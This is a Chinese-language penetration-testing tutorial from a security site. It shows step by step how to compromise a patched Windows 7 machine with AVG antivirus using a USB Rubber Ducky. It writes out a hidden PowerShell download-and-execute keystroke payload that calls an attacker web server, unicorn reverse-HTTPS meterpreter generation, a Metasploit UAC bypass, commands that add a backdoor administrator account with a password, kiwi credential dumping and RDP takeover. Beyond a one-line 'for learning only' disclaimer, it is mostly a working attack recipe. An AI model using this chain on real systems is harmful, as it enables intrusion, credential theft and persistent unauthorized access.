神刀安全网

使用橡皮鸭硬件绕过杀软,渗透Win 7

本文将演示如何使用USB Rubber Ducky和unicorn攻击一台运行AVG2015杀毒软件并且补丁全部打上的Windows 7电脑。本教程仅供学习,请勿用作非法用途。

使用橡皮鸭硬件绕过杀软,渗透Win 7

进行实验所要做的准备:

Windows 7 (受害者主机)

Kali Linux 2.0 (攻击者主机)

USB Rubber Ducky 硬件

注意:Windows 7 和 Kali系统可以是虚拟运行的也可以是实体运行的,但是我们建议在专门的实体硬件上运行Windows7以防止USBRubber Ducky模拟键盘HID的时候虚拟化技术将动态更改USB分配。

获得payload

1. 从Hakshop 购买USB Rubber Ducky Deluxe

使用橡皮鸭硬件绕过杀软,渗透Win 7

2. 访问 USB Rubber Ducky的Wiki 使用其中的模板payload

使用橡皮鸭硬件绕过杀软,渗透Win 7

3. 复制 “Payload – Powershell Wget + Execute” GUI r DELAY 100STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘ http://example.com/bob.old ’,’%TEMP%/bob.exe’);Start-Process “%TEMP%/bob.exe”

使用橡皮鸭硬件绕过杀软,渗透Win 7

4. 将默认的URL“ http://example.com ”改成你自己的域名或IP地址。我的设定是:GUIr DELAY 100 STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘ http://192.168.1.115/win/anything.txt ’,’%TEMP%/drop.cmd’);Start-Process “%TEMP%/drop.cmd” ,然后按回车

5. 把你修改过的代码粘贴到在线DuckToolkit编码器中,选择键盘样式,然后点击生成脚本。

使用橡皮鸭硬件绕过杀软,渗透Win 7

6. 下载“inject.bin” 和 “inject.txt” 文件。把“inject.bin” 复制到Rubber Ducky中的SD卡中,“inject.txt” 供参考之用

使用橡皮鸭硬件绕过杀软,渗透Win 7

7.把micro SD卡插入micro SD USB适配器(不是RubbyDucky),然后插入Kali电脑。

8.将“inject.bin”文件从你的下载文件夹复制到Micro SD卡根目录

使用橡皮鸭硬件绕过杀软,渗透Win 7

9.接下来我们用unicorn生成payload。从GitHub下载unicorn.py。Unicorn是一款使用PowerShell降级攻击的简单工具,它会把shellcode直接注入到内存中。这个项目给予MatthewGraeber的Powershell攻击和DavidKennedy (TrustedSec) 和Josh Kelly在Defcon 18上展示的powershell绕过技巧。

使用橡皮鸭硬件绕过杀软,渗透Win 7

10.在浏览器菜单点击“文件”-“保存为”选项,将页面保存到你的文件系统,我把它放在了桌面上的一个叫USB_RD的文件夹里。

使用橡皮鸭硬件绕过杀软,渗透Win 7

11.用“unicorn.py”生成反向https meterpreter payload。待会你要运行pythonunicorn.py windows/meterpreter/reverse_https 192.168.1.115 8443,记得修改里面的IP地址和端口。

使用橡皮鸭硬件绕过杀软,渗透Win 7

12. 这时两个文件都生成完毕, “powershell_attack.txt” 和“unicorn.rc”。将powershell_attack.txt 命名为第四步中你打算放在服务器上的文件名。我的是“anything.txt”。

注意:“unicorn.rc”文件可以被用在metasploit会话中以建立监听器。

使用橡皮鸭硬件绕过杀软,渗透Win 7

13.复制payload文件“anything.txt”到你的web服务器上。我的文件在web根目录下(步骤4中制定的)

使用橡皮鸭硬件绕过杀软,渗透Win 7

14.开启apache2 web服务器,然后用tail查看日志文件,这样就能看到来自Windows7的请求。

注意:tail的“-f” 参数能够保证文件实时更新

使用橡皮鸭硬件绕过杀软,渗透Win 7

15. 现在我们启动meterpreter 监听器。打开新的终端窗口,进入unicorn.rc 文件所在的目录,然后启动metasploit: msfconsole -runicorn.rc

使用橡皮鸭硬件绕过杀软,渗透Win 7

16.将micro SD卡从攻击主机(Kali)中拔出,然后插入到USBRubber Ducky中。

打上全部补丁的Windows 7 + AVG 2015

使用橡皮鸭硬件绕过杀软,渗透Win 7

Windows 7 网络信息

使用橡皮鸭硬件绕过杀软,渗透Win 7

插入橡皮鸭

17. 在Windows 7中插入USB Rubber Ducky ,稍等片刻等待主机识别设备并执行代码。注意查看web服务器日志,这是你唯一能用来判断是否正常工作的东西。

重要事项:如果你在虚拟机内实验,在插入USB Rubber Ducky之前你得确保Windows7主机处于活跃状态,以防你把橡皮鸭插到别的主机上。

使用橡皮鸭硬件绕过杀软,渗透Win 7

18. 如果Rubber Ducky正常运行了,你马上会看到它在下载你服务器上的文件,然后你还应该看到有个meterpreter会话打开了

使用橡皮鸭硬件绕过杀软,渗透Win 7

使用橡皮鸭硬件绕过杀软,渗透Win 7

19. 接着我们到meterpreter 会话中看看我们能干什么。你可以运行sysinfo 、ipconfig查看主机信息。 sessions -i 1

使用橡皮鸭硬件绕过杀软,渗透Win 7

UAC绕过

20.由于UAC的关系,目前为止,我们还没有系统权限

使用橡皮鸭硬件绕过杀软,渗透Win 7

21. 我们看看能不能用别的模块绕过UAC,经过几番实验后,我们发现bypassuac_vbs可以用来绕过。

使用橡皮鸭硬件绕过杀软,渗透Win 7

22. 设置exploit,然后设置其他payload返回你一个有权限的shell。这次我们使用标准的反向tcp因为创建其他reverse_https通道好像有问题。

使用橡皮鸭硬件绕过杀软,渗透Win 7

23. 执行这个exploit,然后等待建立第二个没有UAC限制的会话

使用橡皮鸭硬件绕过杀软,渗透Win 7

24. 我们看看能不能获取权限

使用橡皮鸭硬件绕过杀软,渗透Win 7

25. 成了!接下来我们创建一个管理员帐号 (haxtorDaMan) 把它提升到管理员组,并且成为远程桌面用户。

net user haxtorDaManhax@Pass50 /add net localgroup “Administrators” haxtorDaMan /add net localgroup“Remote Desktop Users” haxtorDaMan /

使用橡皮鸭硬件绕过杀软,渗透Win 7

26. 我们现在可以到Windows7机器上看看用户有没有创建成功

使用橡皮鸭硬件绕过杀软,渗透Win 7

27. 接下来我们看看能否用kiwi获取明文密码: load kiwi meterpreter> creds_all

使用橡皮鸭硬件绕过杀软,渗透Win 7

远程连接

28. 接着我们尝试用RDP连接到Windows 7,首先在msfconsole运行enable_rdp模块。把SESSION设置为无UAC限制的有权限的session,我的是SESSION2

使用橡皮鸭硬件绕过杀软,渗透Win 7

29. 然后用haxtorDaMan账号登录: xfreerdp /v:192.168.1.108 /port:3389/size:1600 ×900/u:haxtorDaMan /p:hax@Pass50

使用橡皮鸭硬件绕过杀软,渗透Win 7

使用橡皮鸭硬件绕过杀软,渗透Win 7

Note: 我实验的时候rdesktop 不支持Windows加密会话,所以用了xfreerdp。

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 使用橡皮鸭硬件绕过杀软,渗透Win 7

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址